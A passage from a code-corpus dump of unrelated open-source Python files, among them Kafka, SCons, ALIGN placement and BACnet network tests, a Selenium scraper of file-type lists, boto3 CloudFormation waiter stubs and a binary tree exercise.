)
table = "table"
input_dataframe = spark_session.sql("select 'abc' as feature1, 1 as feature2")
hook = CassandraTableSchemaCompatibilityHook(cassandra_client, table)
# act and assert
with pytest.raises(
ValueError, match="There's a schema incompatibility between"
):
hook.run(input_dataframe)
|
tests/tools/protocol/requests/test_offset_fetch_v1.py | akashvacher/kafka-tools | 578 | 12715518 | <reponame>akashvacher/kafka-tools<gh_stars>100-1000
import unittest
from kafka.tools.protocol.requests import ArgumentError
from kafka.tools.protocol.requests.offset_fetch_v2 import OffsetFetchV2Request
class OffsetFetchV2RequestTests(unittest.TestCase):
def test_process_arguments(self):
val = OffsetFetchV2Request.process_arguments(['groupname', 'topicname,4', 'nexttopic,9'])
assert val == {'group_id': 'groupname',
'topics': [{'topic': 'topicname', 'partitions': [4]},
{'topic': 'nexttopic', 'partitions': [9]}]}
def test_process_arguments_alltopics(self):
val = OffsetFetchV2Request.process_arguments(['groupname'])
assert val == {'group_id': 'groupname',
'topics': None}
def test_process_arguments_notenough(self):
self.assertRaises(ArgumentError, OffsetFetchV2Request.process_arguments, [])
|
PyFin/Math/Timeseries/__init__.py | rpatil524/Finance-Python | 325 | 12715520 | # -*- coding: utf-8 -*-
u"""
Created on 2015-8-8
@author: cheng.li
"""
__all__ = ['Timeseries',
'Normalizer']
from PyFin.Math.Timeseries.Timeseries import Timeseries
from PyFin.Math.Timeseries.Normalizers import Normalizer
|
__scraping__/fileinfo.com/main.py | whitmans-max/python-examples | 140 | 12715552 | #!/usr/bin/env python3
# date: 2020.04.19
# https://stackoverflow.com/questions/61298422/extracting-specific-elements-in-a-table-with-selenium-in-python/
import selenium.webdriver
driver = selenium.webdriver.Firefox()
# --- video ---
url = 'https://fileinfo.com/filetypes/video'
driver.get(url)
all_items = driver.find_elements_by_xpath('//td/a')
for item in all_items:
print(item.text)
#print(item.get_attribute('href'))
# --- audio ---
url = 'https://fileinfo.com/filetypes/audio'
driver.get(url)
all_items = driver.find_elements_by_xpath('//td/a')
for item in all_items:
print(item.text)
#print(item.get_attribute('href'))
|
tests/core/meta/meta.py | akmaru/veriloggen | 232 | 12715587 | <reponame>akmaru/veriloggen
from __future__ import absolute_import
from __future__ import print_function
import sys
import os
# the next line can be removed after installation
sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))))
from veriloggen import *
# new intance methods for NewModule
_recipe_control = lambda m: (m.Input('CLK'), m.Input('RST'))
_recipe_led = lambda m, width=8: (m.OutputReg('LED', width, initval=0),
m.Reg('count', 32, initval=0))
# new class based on Module
NewModule = type('NewModule', (Module,),
{ 'recipe_control' : _recipe_control,
'recipe_led' : _recipe_led } )
def mkLed(width=8, maxcount=1024):
m = NewModule('blinkled')
clk, rst = m.recipe_control()
led, count = m.recipe_led(width)
m.Always(Posedge(clk))(
If(rst)(
count(0)
).Else(
If(count == 1023)(
count(0)
).Else(
count(count + 1)
)
))
m.Always(Posedge(clk))(
If(rst)(
led(0)
).Else(
If(count == 1024 - 1)(
led(led + 1)
)
))
return m
if __name__ == '__main__':
led = mkLed()
verilog = led.to_verilog()
print(verilog)
|
test/Clean/mkfifo.py | moroten/scons | 1,403 | 12715624 | <reponame>moroten/scons
#!/usr/bin/env python
#
# __COPYRIGHT__
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "__FILE__ __REVISION__ __DATE__ __DEVELOPER__"
"""
Verify that SCons reports an error when cleaning up a target directory
containing a named pipe created with o.mkfifo().
"""
import os
import TestSCons
test = TestSCons.TestSCons()
if not hasattr(os, 'mkfifo'):
test.skip_test('No os.mkfifo() function; skipping test\n')
test_dir_name = 'testdir'
pipe_path = os.path.join(test_dir_name, 'namedpipe')
test.write('SConstruct', """\
Execute(Mkdir("{0}"))
dir = Dir("{0}")
Clean(dir, '{0}')
""".format(test_dir_name))
test.run(arguments='-Q -q', stdout='Mkdir("{0}")\n'.format(test_dir_name))
os.mkfifo(pipe_path)
test.must_exist(test.workpath(pipe_path))
expect1 = """\
Mkdir("{0}")
Path '{1}' exists but isn't a file or directory.
scons: Could not remove '{0}': Directory not empty
""".format(test_dir_name, pipe_path)
expect2 = """\
Mkdir("{0}")
Path '{1}' exists but isn't a file or directory.
scons: Could not remove '{0}': File exists
""".format(test_dir_name, pipe_path)
test.run(arguments='-c -Q -q')
test.must_exist(test.workpath(pipe_path))
if test.stdout() not in [expect1, expect2]:
test.diff(expect1, test.stdout(), 'STDOUT ')
test.fail_test()
test.pass_test()
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
|
challenge_4/python/tvanderwal/src/challenge_4.py | rchicoli/2017-challenges | 271 | 12715664 | #Challenge 4: Take a binary tree and reverse it
#I decided to create two classes. One to hold the node, and one to act as the Binary Tree.
#Node class
#Only contains the information for the node. Val is the value of the node, left is the left most value, and right is the right value
class Node:
def __init__(self, val):
self.left = None
self.right = None
self.val = val
#BinaryTree class
class BinaryTree:
#Initialize the tree with a blank root
def __init__(self):
self.root = None
def getRoot(self):
return self.root
#Recursively add node objects
def add(self,val):
if self.root is None:
self.root = Node(val)
else:
self._add(val, self.root)
def _add(self, val, node):
if val < node.val:
if node.left is not None:
self._add(val, node.left)
else:
node.left = Node(val)
else:
if node.right is not None:
self._add(val, node.right)
else:
node.right = Node(val)
#Recursively print each node in the tree
def printTree(self):
if self.root is not None:
self._printTree(self.root)
def _printTree(self, node):
if node is not None:
self._printTree(node.left)
print(node.val)
self._printTree(node.right)
#returns a nested list of each level and the nodes in it
def getTree(self):
currLevel = [self.root]
tree = list()
while currLevel:
lowerLevel = list()
currNodes = list()
for node in currLevel:
currNodes.append(node.val)
if node.left:
lowerLevel.append(node.left)
if node.right:
lowerLevel.append(node.right)
tree.append(currNodes)
#print(currNodes)
currLevel = lowerLevel
return tree
if __name__ == '__main__':
#create sample tree from example
tree = BinaryTree()
tree.add(4)
tree.add(2)
tree.add(7)
tree.add(1)
tree.add(3)
tree.add(6)
tree.add(9)
#getTree returns the tree formatted in nested lists
formattedTree = tree.getTree()
#reverse the levels
for level in formattedTree:
level.reverse()
print(level) |
tests/pnr/test_hpwl.py | pretl/ALIGN-public | 119 | 12715670 | <gh_stars>100-1000
import json
import pathlib
from align.pnr.hpwl import gen_netlist, calculate_HPWL_from_placement_verilog_d, Interval, SemiPerimeter
from align.pnr.render_placement import standalone_overlap_checker
def test_interval():
i = Interval()
i.add( 7)
assert 0 == i.dist()
i.add( 3)
assert 4 == i.dist()
def test_semiperimeter():
sp = SemiPerimeter()
sp.addPoint( (3,7))
assert 0 == sp.dist()
sp.addRect( (10,10,12,12))
assert 14 == sp.dist()
def test_gen_netlist():
placement_verilog_d = {
"global_signals": [],
"modules": [
{ "abstract_name": "top",
"concrete_name": "top",
"bbox": [0,0,100,100],
"parameters": [],
"instances": [
{
"abstract_template_name": "a",
"concrete_template_name": "a",
"instance_name": "u0",
"transformation": { "oX": 0, "oY": 0, "sX": 1, "sY": 1},
"fa_map": [{"formal": "x", "actual": "y"}]
},
{
"abstract_template_name": "a",
"concrete_template_name": "a",
"instance_name": "u1",
"transformation": { "oX": 0, "oY": 20, "sX": 1, "sY": 1},
"fa_map": [{"formal": "x", "actual": "y"}]
}
]
}
],
"leaves": [
{ "abstract_name": "a",
"concrete_name": "a",
"bbox": [0,0,10,10],
"terminals": [
{ "name": "x",
"rect": [4,4,6,6]
}
]
}
]
}
nets_d = gen_netlist( placement_verilog_d, 'top')
assert 24 == calculate_HPWL_from_placement_verilog_d( placement_verilog_d, 'top', nets_d)
def test_gen_netlist_flip():
placement_verilog_d = {
"global_signals": [],
"modules": [
{ "abstract_name": "top",
"concrete_name": "top",
"bbox": [0,0,100,100],
"parameters": [],
"instances": [
{
"abstract_template_name": "a",
"concrete_template_name": "a",
"instance_name": "u0",
"transformation": { "oX": 0, "oY": 0, "sX": 1, "sY": 1},
"fa_map": [{"formal": "x", "actual": "y"}]
},
{
"abstract_template_name": "a",
"concrete_template_name": "a",
"instance_name": "u1",
"transformation": { "oX": 15, "oY": 20, "sX": 1, "sY": 1},
"fa_map": [{"formal": "x", "actual": "y"}]
}
]
}
],
"leaves": [
{ "abstract_name": "a",
"concrete_name": "a",
"bbox": [0,0,10,10],
"terminals": [
{ "name": "x",
"rect": [1,2,3,4]
}
]
}
]
}
nets_d = gen_netlist( placement_verilog_d, 'top')
assert 39 == calculate_HPWL_from_placement_verilog_d( placement_verilog_d, 'top', nets_d)
placement_verilog_d['modules'][0]['instances'][0]['transformation'] = { "oX": 10, "oY": 0, "sX": -1, "sY": 1}
assert 33 == calculate_HPWL_from_placement_verilog_d( placement_verilog_d, 'top', nets_d)
placement_verilog_d['modules'][0]['instances'][0]['transformation'] = { "oX": 10, "oY": 10, "sX": -1, "sY": -1}
assert 29 == calculate_HPWL_from_placement_verilog_d( placement_verilog_d, 'top', nets_d)
placement_verilog_d['modules'][0]['instances'][0]['transformation'] = { "oX": 0, "oY": 10, "sX": 1, "sY": -1}
assert 35 == calculate_HPWL_from_placement_verilog_d( placement_verilog_d, 'top', nets_d)
def test_gen_netlist():
placement_verilog_d = {
"global_signals": [],
"modules": [
{ "abstract_name": "top",
"concrete_name": "top",
"bbox": [0,0,100,100],
"parameters": [],
"instances": [
{
"abstract_template_name": "a",
"concrete_template_name": "a",
"instance_name": "u0",
"transformation": { "oX": 0, "oY": 0, "sX": 1, "sY": 1},
"fa_map": [{"formal": "x", "actual": "y"}]
},
{
"abstract_template_name": "a",
"concrete_template_name": "a",
"instance_name": "u1",
"transformation": { "oX": 0, "oY": 20, "sX": 1, "sY": 1},
"fa_map": [{"formal": "x", "actual": "y"}]
}
]
}
],
"leaves": [
{ "abstract_name": "a",
"concrete_name": "a",
"bbox": [0,0,10,10],
"terminals": [
{ "name": "x",
"rect": [4,4,6,6]
}
]
}
],
"global_signals": [
{
"actual": "y"
}
]
}
nets_d = gen_netlist( placement_verilog_d, 'top')
assert 24 == calculate_HPWL_from_placement_verilog_d( placement_verilog_d, 'top', nets_d, skip_globals=False)
assert 0 == calculate_HPWL_from_placement_verilog_d( placement_verilog_d, 'top', nets_d, skip_globals=True)
placement_verilog_d['global_signals'][0]['actual'] = "a"
assert 24 == calculate_HPWL_from_placement_verilog_d( placement_verilog_d, 'top', nets_d, skip_globals=True)
def test_gen_netlist_matrix():
txt = """{
"global_signals": [],
"leaves": [
{
"abstract_name": "slice",
"bbox": [
0,
0,
800,
840
],
"concrete_name": "slice_a",
"terminal_centers": [
{
"center": [
400,
168
],
"name": "inp"
},
{
"center": [
400,
672
],
"name": "out"
}
],
"terminals": [
{
"name": "inp",
"rect": [
124,
152,
676,
184
]
},
{
"name": "out",
"rect": [
124,
656,
676,
688
]
}
]
}
],
"modules": [
{
"abstract_name": "matrix",
"bbox": [
0,
0,
2480,
3528
],
"concrete_name": "matrix_0",
"constraints": [
{
"abut": false,
"constraint": "order",
"direction": "top_to_bottom",
"instances": [
"u0",
"u1",
"u2",
"u3"
]
},
{
"constraint": "same_template",
"instances": [
"u0",
"u1",
"u2",
"u3"
]
}
],
"instances": [
{
"abstract_template_name": "row",
"concrete_template_name": "row_0",
"fa_map": [
{
"actual": "inp",
"formal": "inp"
},
{
"actual": "x1",
"formal": "out"
}
],
"instance_name": "u0",
"transformation": {
"oX": 0,
"oY": 2688,
"sX": 1,
"sY": 1
}
},
{
"abstract_template_name": "row",
"concrete_template_name": "row_0",
"fa_map": [
{
"actual": "x1",
"formal": "inp"
},
{
"actual": "x2",
"formal": "out"
}
],
"instance_name": "u1",
"transformation": {
"oX": 0,
"oY": 1764,
"sX": 1,
"sY": 1
}
},
{
"abstract_template_name": "row",
"concrete_template_name": "row_0",
"fa_map": [
{
"actual": "x2",
"formal": "inp"
},
{
"actual": "x3",
"formal": "out"
}
],
"instance_name": "u2",
"transformation": {
"oX": 0,
"oY": 924,
"sX": 1,
"sY": 1
}
},
{
"abstract_template_name": "row",
"concrete_template_name": "row_0",
"fa_map": [
{
"actual": "x3",
"formal": "inp"
},
{
"actual": "out",
"formal": "out"
}
],
"instance_name": "u3",
"transformation": {
"oX": 0,
"oY": 0,
"sX": 1,
"sY": 1
}
}
],
"parameters": [
"inp",
"out"
]
},
{
"abstract_name": "row",
"bbox": [
0,
0,
2480,
840
],
"concrete_name": "row_0",
"constraints": [
{
"abut": false,
"constraint": "order",
"direction": "left_to_right",
"instances": [
"u0",
"u1",
"u2"
]
},
{
"constraint": "same_template",
"instances": [
"u0",
"u1",
"u2"
]
}
],
"instances": [
{
"abstract_template_name": "slice",
"concrete_template_name": "slice_a",
"fa_map": [
{
"actual": "inp",
"formal": "inp"
},
{
"actual": "x1",
"formal": "out"
}
],
"instance_name": "u0",
"transformation": {
"oX": 0,
"oY": 0,
"sX": 1,
"sY": 1
}
},
{
"abstract_template_name": "slice",
"concrete_template_name": "slice_a",
"fa_map": [
{
"actual": "x1",
"formal": "inp"
},
{
"actual": "x2",
"formal": "out"
}
],
"instance_name": "u1",
"transformation": {
"oX": 880,
"oY": 0,
"sX": 1,
"sY": 1
}
},
{
"abstract_template_name": "slice",
"concrete_template_name": "slice_a",
"fa_map": [
{
"actual": "x2",
"formal": "inp"
},
{
"actual": "out",
"formal": "out"
}
],
"instance_name": "u2",
"transformation": {
"oX": 1680,
"oY": 0,
"sX": 1,
"sY": 1
}
}
],
"parameters": [
"inp",
"out"
]
}
]
}
"""
placement_verilog_d = json.loads(txt)
cn = 'matrix_0'
nets_d = gen_netlist( placement_verilog_d, cn)
assert 27584 == calculate_HPWL_from_placement_verilog_d( placement_verilog_d, cn, nets_d)
placement_verilog_d['modules'][1]['instances'][1]['transformation']["oY"] += 840
placement_verilog_d['modules'][1]['instances'][1]['transformation']["sY"] = -1
assert standalone_overlap_checker( placement_verilog_d, cn)
hpwl = calculate_HPWL_from_placement_verilog_d( placement_verilog_d, cn, nets_d)
print(hpwl)
assert 27584 > hpwl
placement_verilog_d['modules'][0]['instances'][1]['transformation']["oX"] += 2480
placement_verilog_d['modules'][0]['instances'][1]['transformation']["sX"] = -1
assert standalone_overlap_checker( placement_verilog_d, cn)
hpwl2 = calculate_HPWL_from_placement_verilog_d( placement_verilog_d, cn, nets_d)
print(hpwl2)
assert hpwl > hpwl2
placement_verilog_d['modules'][0]['instances'][3]['transformation']["oX"] += 2480
placement_verilog_d['modules'][0]['instances'][3]['transformation']["sX"] = -1
assert standalone_overlap_checker( placement_verilog_d, cn)
hpwl3 = calculate_HPWL_from_placement_verilog_d( placement_verilog_d, cn, nets_d)
print(hpwl3)
assert hpwl2 > hpwl3
placement_verilog_d['modules'][0]['instances'][0]['transformation']["oY"] += 840
placement_verilog_d['modules'][0]['instances'][0]['transformation']["sY"] = -1
placement_verilog_d['modules'][0]['instances'][1]['transformation']["oY"] += 840
placement_verilog_d['modules'][0]['instances'][1]['transformation']["sY"] = -1
placement_verilog_d['modules'][0]['instances'][2]['transformation']["oY"] += 840
placement_verilog_d['modules'][0]['instances'][2]['transformation']["sY"] = -1
placement_verilog_d['modules'][0]['instances'][3]['transformation']["oY"] += 840
placement_verilog_d['modules'][0]['instances'][3]['transformation']["sY"] = -1
assert standalone_overlap_checker( placement_verilog_d, cn)
hpwl4 = calculate_HPWL_from_placement_verilog_d( placement_verilog_d, cn, nets_d)
print(hpwl4)
assert hpwl3 > hpwl4
placement_verilog_d['modules'][1]['instances'][1]['transformation']["oX"] -= 80
placement_verilog_d['modules'][1]['instances'][2]['transformation']["oX"] -= 80
assert standalone_overlap_checker( placement_verilog_d, cn)
hpwl5 = calculate_HPWL_from_placement_verilog_d( placement_verilog_d, cn, nets_d)
print(hpwl5)
assert hpwl4 > hpwl5
placement_verilog_d['modules'][0]['instances'][0]['transformation']["oY"] -= 2*84
placement_verilog_d['modules'][0]['instances'][1]['transformation']["oY"] -= 84
placement_verilog_d['modules'][0]['instances'][2]['transformation']["oY"] -= 84
placement_verilog_d['modules'][0]['instances'][1]['transformation']["oX"] -= 80
placement_verilog_d['modules'][0]['instances'][3]['transformation']["oX"] -= 80
assert standalone_overlap_checker( placement_verilog_d, cn)
hpwl6 = calculate_HPWL_from_placement_verilog_d( placement_verilog_d, cn, nets_d)
print(hpwl6)
assert hpwl5 > hpwl6
print( hpwl6 / 27584 - 1)
|
boto3_type_annotations_with_docs/boto3_type_annotations/cloudformation/waiter.py | cowboygneox/boto3_type_annotations | 119 | 12715718 | <gh_stars>100-1000
from typing import Dict
from botocore.waiter import Waiter
class ChangeSetCreateComplete(Waiter):
def wait(self, ChangeSetName: str, StackName: str = None, NextToken: str = None, WaiterConfig: Dict = None):
"""
Polls :py:meth:`CloudFormation.Client.describe_change_set` every 30 seconds until a successful state is reached. An error is returned after 120 failed checks.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cloudformation-2010-05-15/DescribeChangeSet>`_
**Request Syntax**
::
waiter.wait(
ChangeSetName='string',
StackName='string',
NextToken='string',
WaiterConfig={
'Delay': 123,
'MaxAttempts': 123
}
)
:type ChangeSetName: string
:param ChangeSetName: **[REQUIRED]**
The name or Amazon Resource Name (ARN) of the change set that you want to describe.
:type StackName: string
:param StackName:
If you specified the name of a change set, specify the stack name or ID (ARN) of the change set you want to describe.
:type NextToken: string
:param NextToken:
A string (provided by the DescribeChangeSet response output) that identifies the next page of information that you want to retrieve.
:type WaiterConfig: dict
:param WaiterConfig:
A dictionary that provides parameters to control waiting behavior.
- **Delay** *(integer) --*
The amount of time in seconds to wait between attempts. Default: 30
- **MaxAttempts** *(integer) --*
The maximum number of attempts to be made. Default: 120
:returns: None
"""
pass
class StackCreateComplete(Waiter):
def wait(self, StackName: str = None, NextToken: str = None, WaiterConfig: Dict = None):
"""
Polls :py:meth:`CloudFormation.Client.describe_stacks` every 30 seconds until a successful state is reached. An error is returned after 120 failed checks.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cloudformation-2010-05-15/DescribeStacks>`_
**Request Syntax**
::
waiter.wait(
StackName='string',
NextToken='string',
WaiterConfig={
'Delay': 123,
'MaxAttempts': 123
}
)
:type StackName: string
:param StackName:
The name or the unique stack ID that is associated with the stack, which are not always interchangeable:
* Running stacks: You can specify either the stack\'s name or its unique stack ID.
* Deleted stacks: You must specify the unique stack ID.
Default: There is no default value.
:type NextToken: string
:param NextToken:
A string that identifies the next page of stacks that you want to retrieve.
:type WaiterConfig: dict
:param WaiterConfig:
A dictionary that provides parameters to control waiting behavior.
- **Delay** *(integer) --*
The amount of time in seconds to wait between attempts. Default: 30
- **MaxAttempts** *(integer) --*
The maximum number of attempts to be made. Default: 120
:returns: None
"""
pass
class StackDeleteComplete(Waiter):
def wait(self, StackName: str = None, NextToken: str = None, WaiterConfig: Dict = None):
"""
Polls :py:meth:`CloudFormation.Client.describe_stacks` every 30 seconds until a successful state is reached. An error is returned after 120 failed checks.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cloudformation-2010-05-15/DescribeStacks>`_
**Request Syntax**
::
waiter.wait(
StackName='string',
NextToken='string',
WaiterConfig={
'Delay': 123,
'MaxAttempts': 123
}
)
:type StackName: string
:param StackName:
The name or the unique stack ID that is associated with the stack, which are not always interchangeable:
* Running stacks: You can specify either the stack\'s name or its unique stack ID.
* Deleted stacks: You must specify the unique stack ID.
Default: There is no default value.
:type NextToken: string
:param NextToken:
A string that identifies the next page of stacks that you want to retrieve.
:type WaiterConfig: dict
:param WaiterConfig:
A dictionary that provides parameters to control waiting behavior.
- **Delay** *(integer) --*
The amount of time in seconds to wait between attempts. Default: 30
- **MaxAttempts** *(integer) --*
The maximum number of attempts to be made. Default: 120
:returns: None
"""
pass
class StackExists(Waiter):
def wait(self, StackName: str = None, NextToken: str = None, WaiterConfig: Dict = None):
"""
Polls :py:meth:`CloudFormation.Client.describe_stacks` every 5 seconds until a successful state is reached. An error is returned after 20 failed checks.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cloudformation-2010-05-15/DescribeStacks>`_
**Request Syntax**
::
waiter.wait(
StackName='string',
NextToken='string',
WaiterConfig={
'Delay': 123,
'MaxAttempts': 123
}
)
:type StackName: string
:param StackName:
The name or the unique stack ID that is associated with the stack, which are not always interchangeable:
* Running stacks: You can specify either the stack\'s name or its unique stack ID.
* Deleted stacks: You must specify the unique stack ID.
Default: There is no default value.
:type NextToken: string
:param NextToken:
A string that identifies the next page of stacks that you want to retrieve.
:type WaiterConfig: dict
:param WaiterConfig:
A dictionary that provides parameters to control waiting behavior.
- **Delay** *(integer) --*
The amount of time in seconds to wait between attempts. Default: 5
- **MaxAttempts** *(integer) --*
The maximum number of attempts to be made. Default: 20
:returns: None
"""
pass
class StackUpdateComplete(Waiter):
def wait(self, StackName: str = None, NextToken: str = None, WaiterConfig: Dict = None):
"""
Polls :py:meth:`CloudFormation.Client.describe_stacks` every 30 seconds until a successful state is reached. An error is returned after 120 failed checks.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cloudformation-2010-05-15/DescribeStacks>`_
**Request Syntax**
::
waiter.wait(
StackName='string',
NextToken='string',
WaiterConfig={
'Delay': 123,
'MaxAttempts': 123
}
)
:type StackName: string
:param StackName:
The name or the unique stack ID that is associated with the stack, which are not always interchangeable:
* Running stacks: You can specify either the stack\'s name or its unique stack ID.
* Deleted stacks: You must specify the unique stack ID.
Default: There is no default value.
:type NextToken: string
:param NextToken:
A string that identifies the next page of stacks that you want to retrieve.
:type WaiterConfig: dict
:param WaiterConfig:
A dictionary that provides parameters to control waiting behavior.
- **Delay** *(integer) --*
The amount of time in seconds to wait between attempts. Default: 30
- **MaxAttempts** *(integer) --*
The maximum number of attempts to be made. Default: 120
:returns: None
"""
pass
|
xv_leak_tools/test_components/cleanup/cleanup.py | UAEKondaya1/expressvpn_leak_testing | 219 | 12715730 | from abc import ABCMeta, abstractmethod
from xv_leak_tools.test_components.component import Component
class Cleanup(Component, metaclass=ABCMeta):
@abstractmethod
def cleanup(self):
pass
|
aiogram/types/invoice.py | andrew-ld/aiogram | 2,744 | 12715744 | from . import base
from . import fields
class Invoice(base.TelegramObject):
"""
This object contains basic information about an invoice.
https://core.telegram.org/bots/api#invoice
"""
title: base.String = fields.Field()
description: base.String = fields.Field()
start_parameter: base.String = fields.Field()
currency: base.String = fields.Field()
total_amount: base.Integer = fields.Field()
|
tests/test_network/test_net_6.py | amih90/bacpypes | 240 | 12715765 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Test Network Number Discovery
-----------------------------
"""
import unittest
from bacpypes.debugging import bacpypes_debugging, ModuleLogger, btox, xtob
from bacpypes.core import deferred
from bacpypes.comm import Client, Server, bind
from bacpypes.pdu import PDU, Address, LocalBroadcast
from bacpypes.vlan import Network
from bacpypes.npdu import (
npdu_types, NPDU,
WhoIsRouterToNetwork, IAmRouterToNetwork, ICouldBeRouterToNetwork,
RejectMessageToNetwork, RouterBusyToNetwork, RouterAvailableToNetwork,
RoutingTableEntry, InitializeRoutingTable, InitializeRoutingTableAck,
EstablishConnectionToNetwork, DisconnectConnectionToNetwork,
WhatIsNetworkNumber, NetworkNumberIs,
)
from ..state_machine import match_pdu, StateMachineGroup, TrafficLog
from ..time_machine import reset_time_machine, run_time_machine
from .helpers import SnifferStateMachine, NetworkLayerStateMachine, RouterNode
# some debugging
_debug = 0
_log = ModuleLogger(globals())
#
# TNetwork1
#
@bacpypes_debugging
class TNetwork1(StateMachineGroup):
"""
Network 1 has sniffer1, the TD is on network 2 with sniffer2, network 3 has
sniffer3. Network 1 and 2 are connected with a router IUT1, network 2 and 3
are connected by router IUT2.
"""
def __init__(self):
if _debug: TNetwork1._debug("__init__")
StateMachineGroup.__init__(self)
# reset the time machine
reset_time_machine()
if _debug: TNetwork1._debug(" - time machine reset")
# create a traffic log
self.traffic_log = TrafficLog()
# implementation under test
self.iut1 = RouterNode() # router from vlan1 to vlan2
self.iut2 = RouterNode() # router from vlan2 to vlan3
# make a little LAN
self.vlan1 = Network(name="vlan1", broadcast_address=LocalBroadcast())
self.vlan1.traffic_log = self.traffic_log
# sniffer node
self.sniffer1 = NetworkLayerStateMachine("1", self.vlan1)
self.append(self.sniffer1)
# connect vlan1 to iut1
self.iut1.add_network("2", self.vlan1, 1)
# make another little LAN
self.vlan2 = Network(name="vlan2", broadcast_address=LocalBroadcast())
self.vlan2.traffic_log = self.traffic_log
# test device
self.td = NetworkLayerStateMachine("3", self.vlan2)
self.append(self.td)
# sniffer node
self.sniffer2 = NetworkLayerStateMachine("4", self.vlan2)
self.append(self.sniffer2)
# connect vlan2 to both routers
self.iut1.add_network("5", self.vlan2, 2)
self.iut2.add_network("6", self.vlan2, 2)
# make another little LAN
self.vlan3 = Network(name="vlan3", broadcast_address=LocalBroadcast())
self.vlan3.traffic_log = self.traffic_log
# sniffer node
self.sniffer3 = NetworkLayerStateMachine("7", self.vlan3)
self.append(self.sniffer3)
# connect vlan3 to the second router
self.iut2.add_network("8", self.vlan3, 3)
if _debug:
TNetwork1._debug(" - iut1.nsap: %r", self.iut1.nsap)
TNetwork1._debug(" - iut2.nsap: %r", self.iut2.nsap)
def run(self, time_limit=60.0):
if _debug: TNetwork1._debug("run %r", time_limit)
# run the group
super(TNetwork1, self).run()
# run it for some time
run_time_machine(time_limit)
if _debug:
TNetwork1._debug(" - time machine finished")
# list the state machines which shows their current state
for state_machine in self.state_machines:
TNetwork1._debug(" - machine: %r", state_machine)
# each one has a list of sent/received pdus
for direction, pdu in state_machine.transaction_log:
TNetwork1._debug(" %s %s %s",
direction,
pdu.pduSource or pdu.pduDestination,
pdu.__class__.__name__,
)
# traffic log has what was processed on each vlan
self.traffic_log.dump(TNetwork1._debug)
# check for success
all_success, some_failed = super(TNetwork1, self).check_for_success()
assert all_success
#
# TNetwork2
#
@bacpypes_debugging
class TNetwork2(StateMachineGroup):
"""
This test network is almost exactly the same as TNetwork1 with the
exception that IUT1 is connected to network 2 but doesn't know the
network number, it learns it from IUT2.
"""
def __init__(self):
if _debug: TNetwork2._debug("__init__")
StateMachineGroup.__init__(self)
# reset the time machine
reset_time_machine()
if _debug: TNetwork2._debug(" - time machine reset")
# create a traffic log
self.traffic_log = TrafficLog()
# implementation under test
self.iut1 = RouterNode() # router from vlan1 to vlan2
self.iut2 = RouterNode() # router from vlan2 to vlan3
# make a little LAN
self.vlan1 = Network(name="vlan1", broadcast_address=LocalBroadcast())
self.vlan1.traffic_log = self.traffic_log
# sniffer node
self.sniffer1 = NetworkLayerStateMachine("1", self.vlan1)
self.append(self.sniffer1)
# connect vlan1 to iut1
self.iut1.add_network("2", self.vlan1, 1)
# make another little LAN
self.vlan2 = Network(name="vlan2", broadcast_address=LocalBroadcast())
self.vlan2.traffic_log = self.traffic_log
# test device
self.td = NetworkLayerStateMachine("3", self.vlan2)
self.append(self.td)
# sniffer node
self.sniffer2 = NetworkLayerStateMachine("4", self.vlan2)
self.append(self.sniffer2)
# connect vlan2 to both routers
self.iut1.add_network("5", self.vlan2, None) ### NOT CONFIGURED
self.iut2.add_network("6", self.vlan2, 2)
# make another little LAN
self.vlan3 = Network(name="vlan3", broadcast_address=LocalBroadcast())
self.vlan3.traffic_log = self.traffic_log
# sniffer node
self.sniffer3 = NetworkLayerStateMachine("7", self.vlan3)
self.append(self.sniffer3)
# connect vlan3 to the second router
self.iut2.add_network("8", self.vlan3, 3)
if _debug:
TNetwork2._debug(" - iut1.nsap: %r", self.iut1.nsap)
TNetwork2._debug(" - iut2.nsap: %r", self.iut2.nsap)
def run(self, time_limit=60.0):
if _debug: TNetwork2._debug("run %r", time_limit)
# run the group
super(TNetwork2, self).run()
# run it for some time
run_time_machine(time_limit)
if _debug:
TNetwork2._debug(" - time machine finished")
# list the state machines which shows their current state
for state_machine in self.state_machines:
TNetwork2._debug(" - machine: %r", state_machine)
# each one has a list of sent/received pdus
for direction, pdu in state_machine.transaction_log:
TNetwork2._debug(" %s %s %s",
direction,
pdu.pduSource or pdu.pduDestination,
pdu.__class__.__name__,
)
# traffic log has what was processed on each vlan
self.traffic_log.dump(TNetwork2._debug)
# check for success
all_success, some_failed = super(TNetwork2, self).check_for_success()
assert all_success
@bacpypes_debugging
class TestSimple(unittest.TestCase):
def test_idle(self):
"""Test an idle network, nothing happens is success."""
if _debug: TestSimple._debug("test_idle")
# create a network
tnet = TNetwork1()
# all start states are successful
tnet.td.start_state.success()
tnet.sniffer1.start_state.success()
tnet.sniffer2.start_state.success()
tnet.sniffer3.start_state.success()
# run the group
tnet.run()
@bacpypes_debugging
class TestNetworkNumberIs(unittest.TestCase):
def test_1(self):
"""Test broadcasts from a router."""
if _debug: TestNetworkNumberIs._debug("test_1")
# create a network
tnet = TNetwork1()
# tell the IUT to send what it knows
